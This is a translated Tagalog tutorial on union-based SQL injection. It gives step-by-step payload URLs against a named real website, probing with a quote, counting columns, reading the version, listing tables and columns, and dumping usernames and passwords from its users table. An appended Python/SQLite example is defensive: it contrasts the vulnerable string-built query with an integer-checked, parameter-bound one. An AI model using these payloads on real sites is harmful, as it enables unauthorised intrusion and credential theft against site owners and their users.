
SQL Injection - TAGALOG TUTORIAL

NOTE: Just a reminder, learn to read. The quotation marks and parentheses are not part of what you type.

First, find a vulnerable website.
Let's try this one.

Example:
http://www.celtiqueenergie.com/article.php?id=54

How do you know whether a website is vulnerable to SQL Injection?
Put a ( ' ) at the end. (The parentheses are not included.)

It will look like this:
http://www.celtiqueenergie.com/article.php?id=54'


Hit [Enter]. Then something like this will appear:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Okay, this website can be used for our SQLi test.
Next, find the tables of our target website.

Delete the ( ' ) and replace it with "order by" (the parentheses are not included),
then add ( 10-- ) at the end. (The parentheses are not included.)

Like this:

http://www.celtiqueenergie.com/article.php?id=54 order by 10--

http://www.celtiqueenergie.com/article.php?id=54 order by 20--

http://www.celtiqueenergie.com/article.php?id=54 order by 30--

When the error "Unknown column '30' in 'order clause'" appears, keep lowering the number until the "order clause" error disappears.
So the correct number (the column count) is 24--

http://www.celtiqueenergie.com/article.php?id=54 order by 24--

Next, change "order by" to "union select" and put a ( - ) (the parentheses are not included) right after the = and before the 54.

Like this:

EXAMINE IT CAREFULLY.
Suppose it looks like this.

http://www.celtiqueenergie.com/article.php?id=-54 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

Hit [Enter]. You will see something like this on the page:

3
13,3 11 117

The number that appears in BOLD (3 here) is the one you replace with "@@version".

Like this:

http://www.celtiqueenergie.com/article.php?id=-54 union select 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

Hit [Enter] and something like "5.1.46-log" will appear.

NOTE:
Always remember: if the version is lower than 5.0.0-log, for example 4.45.0-log, MOVE TO ANOTHER WEBSITE. THAT VERSION OF THE SITE CAN'T BE USED BECAUSE IT HAS NO TABLE SCHEMA (information_schema).

Next, replace "@@version" with "group_concat (table_name)", then at the end after 24 remove the ( -- ) and replace it with this:

from information_schema.tables where table_schema=database()--

It will look like this:
http://www.celtiqueenergie.com/article.php?id=-54 union select 1,2,group_concat (table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.tables where table_schema=database()--

You will see something like this:

cont_lic_lu,content,content_types,countries,documents,fact_page_lu,fastfacts,hpitems,hpslides,itemtypes,languages,lic_holder_lu,lic_partner_lu,licences,links,locations,newsitems,operators,pages,pictures,sections,slides,slideshows, #users

What appears depends on the website. Our target table is users. Now replace "group_concat (table_name)" with "group_concat (column_name)", and delete everything from "from" onward, replacing it with

"from information_schema.columns where table_schema=database()--"

It will look like this:

http://www.celtiqueenergie.com/article.php?id=-54 union select 1,2,group_concat (column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database()--

Then finally, find the Username and Password. If you still remember, #users is our target table; that is where the username and password will come from.

Here it is:

Replace (column_name) with (username,0x3a,password), then delete everything after FROM, keep only the FROM, and put our target table at the end, like this:

http://www.celtiqueenergie.com/article.php?id=-54 union select 1,2,group_concat (username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from users--
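Added example, not code from the original tutorial or from the site it targets: a self-contained Python/SQLite model of the kind of `article.php?id=` lookup the steps above assume, showing why pasting the raw `id` value into the SQL text lets the `'` test, the `order by` probe and the `union select` payload through, and how an integer check plus a bound parameter shuts all three down. The schema, rows and function names are constructed for this example.

```python
import sqlite3

# Constructed in-memory schema standing in for the tutorial's article.php backend
# (table and row contents are made up for this example).
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO articles VALUES (54, 'Sample article', 'Body text');
INSERT INTO users VALUES ('admin', 'constructed-hash');
""")


def lookup_unsafe(id_param: str):
    """The pattern the tutorial relies on: the raw query-string value is pasted
    into the SQL text, so a stray ' breaks the syntax, 'order by N' reveals the
    column count, and 'union select' appends rows from any other table."""
    sql = f"SELECT title, body FROM articles WHERE id = {id_param}"
    return conn.execute(sql).fetchall()


def lookup_safe(id_param: str):
    """Hardened form: enforce the expected type, then bind the value as a
    parameter so the database driver never interprets it as SQL."""
    try:
        article_id = int(id_param)
    except ValueError:
        # Reject (and log) anything that is not an integer id; 'order by' or
        # 'union select' in this parameter is a clear attack signal for detection.
        raise ValueError("id must be an integer") from None
    sql = "SELECT title, body FROM articles WHERE id = ?"
    return conn.execute(sql, (article_id,)).fetchall()


def outcome(fn, id_param: str) -> str:
    """Summarise what a given lookup does with a given id value."""
    try:
        rows = fn(id_param)
    except ValueError:
        return "rejected"
    except sqlite3.OperationalError:
        return "sql error"  # the equivalent of the error page the tutorial looks for
    return "rows:" + ";".join(",".join(map(str, r)) for r in rows)


if __name__ == "__main__":
    payload = "-54 union select username, password from users--"
    for fn in (lookup_unsafe, lookup_safe):
        for value in ("54", "54'", "54 order by 10--", "54 order by 2--", payload):
            print(f"{fn.__name__:14} {value!r:55} -> {outcome(fn, value)}")
```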